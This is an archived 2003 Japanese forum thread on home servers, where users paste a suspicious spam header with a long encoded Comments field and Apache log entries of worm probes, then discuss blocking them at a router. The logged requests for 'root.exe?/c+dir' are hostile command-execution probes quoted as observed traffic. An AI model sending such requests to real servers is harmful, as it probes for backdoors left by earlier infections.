91 : メールヘッダーが変なんですけど。何かわかりますかね。 ヘッダーは2.4KBあり、、Comments:の行がやたら長いです。 本文はスパムみたいなんですけど、sendmailのバグを狙っているような... ワームの様な気もしてます。。。 Return-Path: <mailbox1@usgreencardoffice.com> Received: from smtp1.cwidc.net (smtp1.cwidc.net [154.33.63.111]) by xxxx.jp (8.12.8/8.12.5) with ESMTP id h3BDBGKZ017325 for <xxxxx@xxxxx.jp>; Fri, 11 Apr 2003 22:11:19 +0900 Received: from [154.33.63.58] (helo=mail8.cwidc.net) by smtp1.cwidc.net with esmtp (Exim 3.20 #4) id 193yJ3-0004So-00 for xxxxx@xxxxx.jp; Fri, 11 Apr 2003 22:11:01 +0900 Received: from pop by mail8.cwidc.net with local (Exim 3.20 #2) id 193yIz-0003BH-00 for xxxxx@xxxxx.jp; Fri, 11 Apr 2003 22:10:57 +0900 Received: from [206.40.228.122] (helo=sm22.localdomain) by mail8.cwidc.net with esmtp (Exim 3.20 #2) id 193yIy-0003AM-00; Fri, 11 Apr 2003 22:10:56 +0900 Received: from unknown Date: Fri, 11 Apr 2003 07:10:19 -0600 (MDT) Message-Id: <200304111310.h3BDAJIV019352@sm22.localdomain> Comments: Received: from PbD:C6?oC65]:?E6CB]@C];A|E2<6492?oC65]:?E6CB]@C];ANz B Received: from Jx2<2oC65]24|2:2:oC65]2?]688]@C];A|46J`geb_oC65]2?]688]@C];A|7FC F<2H2oC65]2?]688]@C];A|8@?K@FoC65]2?]688]@C];A|9\@oC65]2?]688]@C];ATx M Recei ved: from Ma92>2oC65]2?]688]@C];A|9:0?6EoC65]2?]688]@C];A|9:<2CFoC65]2?]688]@C]; A|:K>\AoC65]2?]688]@C];A|<2EF9:D2oC65]2?]688]@C];A|<:>:oC65]2?]688]@C];ATv T Re ceived: from Tu<F>2oC65]2?]688]@C];A|<FD2?@oC65]2?]688]@C];A|>:J2?@oC65]2?]688] @C];A|?30>2?2oC65]2?]688]@C];A|E\6oC65]2?]688]@C];A|E2<2\<oC65]2?]688]@C];ATq R Received: from AcE6E@C2oC65]2?]688]@C];A|A2EC:4<oC65]2EC]4@];A|92D6oC65]6> 2:=]?6];A|KIad_oC65]6>2:=]?6];A|36673@H=oC65]9@E]4@];A|3JC5oC65]9@E]4@];ATz G Re ceived: from Rm9@?6J366oC65]9@E]4@];A|<:?492?oC65]9@E]4@];A|?282@oC65]9@E]4@] ;A|JFA@>oC65]9@E]4@];A|2=8oC65]:?E6CB]@C];A|3@>3oC65]:?E6CB]@C];AMr Z Receive d: from Nr43c__7oC65]:?E6CB]@C];A|4J36CoC65]:?E6CB]@C];A|7F8F@oC65]:?E6CB]@C]; A|92J2EoC65]:?E6CB]@C];A|9:C@E@oC65]:?E6CB]@C];A|9@C:<:E2oC65]:?E6CB]@C];ATT T Received: from Nz<2KF9:C@oC65]:?E6CB]@C];A|<:5oC65]:?E6CB]@C];A|<@3@=5DoC65]: ?E6CB]@C];A|>2DoC65]:?E6CB]@C];A|>2D2@oC65]:?E6CB]@C];A|>:J23:oC65]:?E6CB]@C]; ARb Y Received: from PQ?:;:oC65]:?E6CB]@C];A|?@<@oC65]:?E6CB]@C];A|D2326oC65]: ?E6CB]@C];A|D249:oC65]:?E6CB]@C];A|D6?36:oC65]:?E6CB]@C];A|D:=6?46oC65]:?E6CB] @C];ARz M Errors: mailbox1@usgreencardoffice.com From: "US Green Card Office Ltd." <mailbox1@usgreencardoffice.com> To: Customer <customer@usgreencardoffice.com> Subject: Get a Green Card for USA MIME-Version: 1.0 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Status:
92 : うざい 219.140.150.166 - - [13/Apr/2003:16:51:23 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1045 "-" "-" 219.140.150.166 - - [13/Apr/2003:16:51:26 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1045 "-" "-" ・ ・ ・ 前にCodeRedに対抗するCode Greenてのが来たけど もう来ないな。 またこないかな。
93 : OrgName: Asia Pacific Network Information Centre NetRange: 202.0.0.0 - 203.255.255.255 CIDR: 202.0.0.0/7 ここ、IPうじゃうじゃ持ってて最高にうざい。 二日で100個以上CodeRed来てるけど、ここが8割占めてたw LAN内全感染の悪寒。 ってかIPいっぱいあるから一見いろんなとこから来てるみたいだけど、穴のあるところが 全部穴になって被害を広めてるのね。 #Apache初心者だから、ログを取らせない方法が良くわかんねえよ。 ・ウイルス扱いにする。 ・指定ファイルにアクセスしようとしたのは載せない。 ・実際に、0Byteの指定ファイルを作っておく。 があった。みんなどうよ?つーかどれが普通よ?
94 : 略称のほうは知ってた・・ APNICかよ。 マトモなとこだから他から経由されてるだけな気がするな・・・
95 : >>93 それ中国あたりのブロック割り当てじゃない? うちにも中国方面からガンガンくるよ。
96 : >>93 ルーターで弾く。
97 : >>96 手作業での登録ですか? 手間が馬鹿にならんので、テクニックあればいいんだけど。
98 : >>95 JPNIC に関連団体で乗ってるところ。ほんとに感染してるなら微妙に恥かと。 http://216.239.57.100/search?q=cache:5uDTH1GaA9oC:www.nic.ad.jp/ja/profile/link.html+Asia+Pacific+Network+Information+Centre&hl=ja&lr=lang_ja&ie=UTF-8
99 : >>93 ネタだよね?ね?ね?
100read 1read 1read 100read TOP カテ一覧 スレ一覧 2ch元 削除依頼 ▲
自宅サーバの火事の危険性についてのスレ (507)
うちの鯖で遊んでください (654)
読み方が分からない用語はここで聞け! (274)
IPV4が無くなるって! (260)
41氏の玄箱sarge化実況 (340)
41氏の玄箱sarge化実況 (340)
--log9.info------------------
藤井尚之 part2 (243)
【女神の仕業】 原マスミ Part2 【悪魔の親切】 (251)
ネスミス (316)
【活動】トムソー13世 part2【再開】 (405)
♪宇多田ヒカル統一スレ・パート386♪ (766)
【義援金詐欺疑惑】柴田淳 Part.159【11万3350円】 (834)
浜田麻里☆Part47☆ (458)
■■■MISIA Part90-15th Celebration-■■■ (747)
【Rは】谷村奈南 part13【正義】 (543)
Salyu その87 (298)
YUKI part.141☆★BEAT GOES ON★☆ (326)
Superfly part55 (268)
倖田 來未 Kumi Koda (376)
May'n(メイン)126曲目 (433)
*・゚゚・*:.。.:*★中島美嘉 Vol.119★*:..。.:*・゚゚・* (685)
aiko LOVE LIKE POP Vol.473 (235)
--log55.com------------------
千葉県のキャンプ場 part1
道志みちのキャンプ場を語れ
復活!キャンプ場で見てみたい綺麗な若奥さん その20
群馬の山を語ろう 7
【クマと】熊対策スレ 4頭目【踊ろう】
【丹沢】栗ノ木洞に登ろう(^_^;)!part14【鍋割】
【山ガール 】山での野糞・野小便のテクニック 2
【BS-TBS】 ヒロシのぼっちキャンプ 【二泊目】